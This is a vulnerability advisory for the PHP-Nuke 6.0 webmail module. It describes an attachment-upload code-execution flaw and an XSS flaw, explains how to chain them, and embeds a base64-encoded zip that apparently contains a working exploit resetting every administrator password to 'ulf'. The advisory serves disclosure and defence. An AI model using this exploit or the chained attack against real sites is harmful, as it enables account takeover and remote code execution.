COMMAND

	PHP-Nuke code execution and XSS vulnerabilities

SYSTEMS AFFECTED

	PHP-Nuke 6.0

PROBLEM

	Thanks to Ulf Harnhammar [ulfh@update.uu.se] advisory :
	
	--snip--
	
	PHP-Nuke has got a web mail system,  and  it  stores  attachments  under
	their real file names in a directory where anyone can surf to them.
	
	There is nothing in the code that stops  active  content,  such  as  PHP
	scripts, from being stored in that directory. There is also  no  warning
	against this in the program's documentation. As a result,  any  attacker
	can execute any PHP script on the web server. The attacker  first  sends
	the script as an attachment to any user who will read  that  message  in
	PHP-Nuke's web mail system. The attacker then  waits  for  the  user  to
	open the message, and finally the attacker just surfs to  a  predictable
	WWW location. The user doesn't even have to open  the  attachment,  just
	the mail that it comes in.
	
	As a bonus,  the  web  mail  system  also  has  a  Cross-Site  Scripting
	vulnerability. It doesn't remove <script> tags in HTML  based  e-mail
	messages.
	
	
	When we combine the two vulnerabilities, we find that it is possible  to
	construct an e-mail message that will automatically execute an  attached
	PHP script when an unsuspecting user opens that message!
	
	This is very bad,  as  PHP  scripts  can  access  files,  databases  and
	network resources. They can for instance  store  a  C  program  in  some
	temporary location, compile it and execute it.
	
	To make things even worse, the availability of anonymous  remailers  and
	the fact that the PHP script will  be  accessed  from  the  victim's  IP
	number and not the attacker's makes the attacker pretty anonymous.
	
	--snap--
	
	 EXPLOIT:
	 ========
	
	I have also attached an  exploit  for  this  issue,  which  changes  all
	administrator passwords on the PHP-Nuke system to  "ulf".  The  attacker
	simply sends an HTML mail with the contents of my xss.html file  as  the
	*mail body* and my adminexploit.php file as an attachment.  As  soon  as
	the victim opens the mail, the script is executed.
	
	---293465837-781401444-1040052962=:9852
	Content-Type: APPLICATION/zip; name="php-nuke_webmail.zip"
	Content-Transfer-Encoding: BASE64
	Content-ID: <Pine.LNX.4.21.0212161636020.9852@Tempo.Update.UU.SE>
	Content-Description: 
	Content-Disposition: attachment; filename="php-nuke_webmail.zip"
	
	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
	---293465837-781401444-1040052962=:9852--
	

SOLUTION

	No official patch yet